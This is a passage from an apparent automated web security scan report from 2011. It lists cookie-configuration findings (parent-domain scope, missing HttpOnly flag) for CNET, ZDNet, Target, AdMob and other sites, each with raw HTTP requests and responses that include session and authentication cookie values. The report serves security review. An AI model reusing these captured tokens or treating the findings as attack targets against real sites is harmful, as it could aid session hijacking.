Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:52 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:47 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=954
Connection: Keep-Alive
Content-Length: 104182

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml">
<!-- Yoda loves you -->
<head> <title>Software news, tips and opinions from Download.com editor
...[SNIP]...

10.22. http://download.cnet.com/mac/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mac/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mac/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:49 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:06:58 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 51
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:49 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowLat=1294837309101; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:49 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:49 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:49 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:54 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:49 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=986
Connection: Keep-Alive
Content-Length: 99322

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mac - Fr
...[SNIP]...

10.23. http://download.cnet.com/mobile-downloads/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /mobile-downloads/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mobile-downloads/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:50 GMT
Via: HTTP/1.0 phx1-rb-dl-app9.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:50 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:50 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowLat=1294837310099; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:50 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:50 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:50 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:55 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:50 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=991
Connection: Keep-Alive
Content-Length: 78960

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Mobile -
...[SNIP]...

10.24. http://download.cnet.com/webware-apps/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /webware-apps/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webware-apps/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:54 GMT
Via: HTTP/1.0 phx1-rb-frontend1-app8.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en
Expires: Wed, 12 Jan 2011 13:07:54 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:54 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowLat=1294837313774; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:54 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:54 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:54 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:01:59 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:54 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=994
Connection: Keep-Alive
Content-Length: 36086

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Webware
...[SNIP]...

10.25. http://download.cnet.com/windows/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://download.cnet.com
Path:   /windows/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /windows/ HTTP/1.1
Host: download.cnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: XCLGFbrowser=Cg5iVU0qL2O/AAAAdRw; MADTEST=1; rbSessionId=Cg5gU00qL2CtwdbzqSI; MADUCAT=1&0109&BK14860; mad_rsi_segs=; arrowLat=1294610272673; arrowSpc=1; tempSessionId=Cg5gnU0qL2CtwdbzfuE; arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html;

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:01:55 GMT
Via: HTTP/1.0 phx1-rb-dl-app1.cnet.com:8924 (cnwk.proxy.servlet.PathProxyServlet $Revision: 218012 $)
Content-Language: en-US
Expires: Wed, 12 Jan 2011 13:05:39 GMT
Cache-Control: max-age=360, stale-if-error=86400
X-CNET-HEADERREMOVE: Cache-Control
X-CNET-HEADER-Cache-Control: max-age=360
Age: 136
Content-Type: text/html; charset=UTF-8
Set-Cookie: arrowSSRefUrl=http%3A%2F%2Fpacketstormsecurity.org%2Fnews%2Fview%2F18431%2FAndroid-Lands-Cloud-Security-From-Trend-Micro.html; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:31:55 GMT
Set-Cookie: arrowLrps=1294610272673; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowLat=1294837315852; domain=.cnet.com; path=/; expires=Thu, 12-Jan-2012 13:01:55 GMT
Set-Cookie: arrowSpc=1; domain=.cnet.com; path=/; expires=Fri, 11-Feb-2011 13:01:55 GMT
Set-Cookie: arrowTmUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 14:01:55 GMT
Set-Cookie: arrowLnUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
Set-Cookie: arrowBiChecked=true; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:00 GMT
Set-Cookie: arrowHtcUser=false; domain=.cnet.com; path=/; expires=Wed, 12-Jan-2011 13:02:55 GMT
P3P: CP="CAO DSP COR CURa ADMa DEVa PSAa PSDa IVAi IVDi CONi OUR OTRi IND PHY ONL UNI FIN COM NAV INT DEM STA"
Keep-Alive: timeout=15, max=909
Connection: Keep-Alive
Content-Length: 102759

<!DOCTYPE html> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb="http://www.facebook.com/2008/fbml"> <!-- Yoda loves you -->
<head> <title>Free sof
...[SNIP]...

10.26. http://landesm.gfi.com/event-log-analysis-sm/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://landesm.gfi.com
Path:   /event-log-analysis-sm/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /event-log-analysis-sm/ HTTP/1.1
Host: landesm.gfi.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Date: Wed, 12 Jan 2011 03:46:07 GMT
Etag: "17424fa7bc85ec85fc725f2b8328bb89ca03be4c"
Server: TornadoServer/1.0
Set-Cookie: __ptcx=7uXan4.9hp3Sx.1; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Set-Cookie: __pcid=7uXan4:1; Domain=.gfi.com; expires=Mon, 11 Jul 2011 03:46:07 GMT; Path=/
Content-Length: 30171
Connection: Close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<META http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Event log analysis &amp; management</title>

...[SNIP]...

10.27. http://www.zdnet.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.zdnet.com
Path:   /

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.zdnet.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 05:08:03 GMT
Server: Apache
Set-Cookie: geo-data=%7B%22region%22%3A%22tx%22%2C%22connectionspeed%22%3A%22broadband%22%2C%22regionconf%22%3A%224%22%2C%22metrocode%22%3A%22623%22%2C%22longittude%22%3A%22-96.799%22%2C%22countrycode%22%3A%22840%22%2C%22continentcode%22%3A%226%22%2C%22countryconf%22%3A%225%22%2C%22country%22%3A%22usa%22%2C%22city%22%3A%22dallas%22%2C%22cityconf%22%3A%223%22%2C%22citycode%22%3A%2277%22%2C%22domain%22%3A%22BNET%22%2C%22regioncode%22%3A%2244%22%2C%22latitude%22%3A%2232.787%22%7D; expires=Thu, 12-Jan-2012 05:08:03 GMT; path=/; domain=.zdnet.com
Keep-Alive: timeout=15, max=999
Connection: Keep-Alive
Content-Type: text/html; charset=utf-8
Content-Length: 117305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<me
...[SNIP]...

11. Cookie without HttpOnly flag set  previous  next
There are 63 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



11.1. http://weeklyad.target.com/target/default.aspx  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://weeklyad.target.com
Path:   /target/default.aspx

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /target/default.aspx HTTP/1.1
Host: weeklyad.target.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 302 Moved Temporarily
Content-Type: text/html; charset=utf-8
Location: /target/default.aspx?action=entryflash&
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
X-Powered-By: ASP.NET
P3P: CP="NON DSP TAIa PSAa PSDa OUR NOR IND ONL UNI COM NAV INT"
Content-Length: 166
Expires: Wed, 12 Jan 2011 04:16:11 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Wed, 12 Jan 2011 04:16:11 GMT
Connection: close
Set-Cookie: SLHUID=UID=11011122161102414320608630493S&Version=1.65; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: ShoppingListCount=0; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: ShoppingList=; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: SLHTrackingSessionID=11011122161102414320608630494S; expires=Wed, 12-Jan-2011 04:46:11 GMT; path=/
Set-Cookie: Prefs=LanguageID=1&SiteID=787&PRetailerID=-99880&OnlineServer=&OnlineSID=&tag=tcom-gbexpo71-20; path=/
Set-Cookie: SLHCookie=LanguageID=1; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/
Set-Cookie: DisplayMode=preferred=flash; expires=Tue, 01-Jan-2030 06:00:00 GMT; path=/

<html><head><title>Object moved</title></head><body>
<h2>Object moved to <a href="%2ftarget%2fdefault.aspx%3faction%3dentryflash%26">here</a>.</h2>
</body></html>

11.2. http://www.43things.com/person/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.43things.com
Path:   /person/

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /person/ HTTP/1.1
Host: www.43things.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Date: Wed, 12 Jan 2011 13:08:00 GMT
Server: Apache/2.2.3 (Red Hat)
X-Powered-By: Phusion Passenger (mod_rails/mod_rack) 2.2.4
X-Runtime: 0.01017
Cache-Control: no-cache
Set-Cookie: ubid=SV2zpKsaoTKvCsQCCVAPEBCrBaA%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: auth=pnAiy5OTmH8VYlJnGjHyFoBpPvpc4DPnYbLKjnQeNv9Q7ss4zO9i2gGP8aKM5xF9EY9nas978c%2BQyCXn8qgOvWb28tIflxH1k8TKgw8KLZE%3D; domain=.43things.com; path=/; expires=Sat, 09 Jan 2021 13:08:00 GMT
Set-Cookie: rw=; domain=.43things.com; path=/; expires=Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: _session_id=29d6c53e1159bfde1f23b713b0b5d77e; domain=.43things.com; path=/
Content-Length: 13962
Status: 404 Not Found
Cache-Control: max-age=1
Expires: Wed, 12 Jan 2011 13:08:01 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>43 Things</title>
<m
...[SNIP]...

11.3. http://www.admob.com/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.admob.com
Path:   /

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.admob.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 13:08:05 GMT
Server: Apache
Set-Cookie: session_cookie=bd074ecbb806244a67a03a6f2aac7d85; expires=Wed, 12-Jan-2011 15:08:05 GMT; path=/; domain=.admob.com
Set-Cookie: mrkting_landing_page_url=%2F; expires=Sat, 09-Jan-2021 13:08:05 GMT; path=/; domain=.admob.com
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13118

<!doctype html>
<html>
   <head>
       <title>Mobile Advertising | Buy Ads | Monetize Traffic | AdMob</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<met
...[SNIP]...

11.4. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Allure  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_Allure

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_Allure HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:43 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000G-h5yYIX_fsCdYaaomzo48b:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:23 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0YB%0aJl69zTeOdt0W%2fI1bQxUaXluBK4%2b4re%2bNGtxBIVjSxQMGJbwroUJ2uepbtFXi4W8%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419596%3atrue%3afalse%3a0%3aqFLccT2YrlnZwn4eqF9jLONT7P4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29783


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.5. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_ArchitecturalDigest HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:38 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000xNqeoIoWgm7tfT4YP_0pvgw:12jr714ca; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:29 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0YlZQawo6a%2fCa%0adt0Ca5sgwGLGZRYgwcw9yVBAEI4l4WP6D%2flSrQrYmWvnSq3PAt9DJMCltsf9lks%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16420003%3atrue%3afalse%3a0%3amAg2jXtkO5mMA5V5w%2f5pyYw%2fn1g%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 26827


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.6. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_BonAppetite  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   https://www.magazinestoresubscriptions.com
Path:   /webapp/wcs/stores/servlet/Subscriptions_BonAppetite

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /webapp/wcs/stores/servlet/Subscriptions_BonAppetite HTTP/1.1
Host: www.magazinestoresubscriptions.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 12 Jan 2011 04:44:51 GMT
Server: IBM_HTTP_Server/6.0.2.31 Apache/2.0.47 (Unix)
Pragma: No-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Set-Cookie: JSESSIONID=0000tbdA8jKr2XFeez646mYyAzj:12jnveaj2; Path=/
Set-Cookie: REFERRER=""; Expires=Wed, 26 Jan 2011 04:53:41 GMT; Path=/
Set-Cookie: WC_SESSION_ESTABLISHED=true; Path=/
Set-Cookie: WC_AUTHENTICATION_-1002=%2d1002%2cRH6gD%2bXy5DpzRjiDAyHRFYiJ7VI%3d; Path=/; Secure
Set-Cookie: WC_ACTIVEPOINTER=%2d1%2c10001; Path=/
Set-Cookie: WC_USERACTIVITY_-1002=%2d1002%2c10001%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cnull%2cZzMyIJZot6Wq%2fcnmapee%2f0d6JbmYYi7b5mFcJATVbwKgg2xKrPiE8bljyvYeFRC0dSpvHcG0I0bb%0agmx%2fBKjEubD1u2lDzKNrp%2fxq%2fEh3zocUN0K08ospwh0L1bcod31%2fGhJWskPe%2bvA%3d; Path=/
Set-Cookie: WC_GENERIC_ACTIVITYDATA=[16419605%3atrue%3afalse%3a0%3a6TUPgGq3ci7IPBw4tu5kSdECWw4%3d][com.ibm.commerce.context.base.BaseContext|10001%26%2d1002%26%2d1002%26%2d1][com.ibm.commerce.catalog.businesscontext.CatalogContext|10001%26null%26false%26false%26false][com.ibm.commerce.context.globalization.GlobalizationContext|%2d1%26USD%26%2d1%26USD][com.ibm.commerce.context.entitlement.EntitlementContext|4000000000000000001%264000000000000000001%26null%26%2d2000][com.ibm.commerce.context.experiment.ExperimentContext|null][CTXSETNAME|Store][com.ibm.commerce.context.audit.AuditContext|null]; Path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Language: en-US
Content-Length: 29951


                                   <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transi
...[SNIP]...

11.7. https://www.magazinestoresubscriptions.com/webapp/wcs/stores/servlet/Subscriptions_Brides  previous  next

Summary

Severity:   Low
Confidence:   Firm
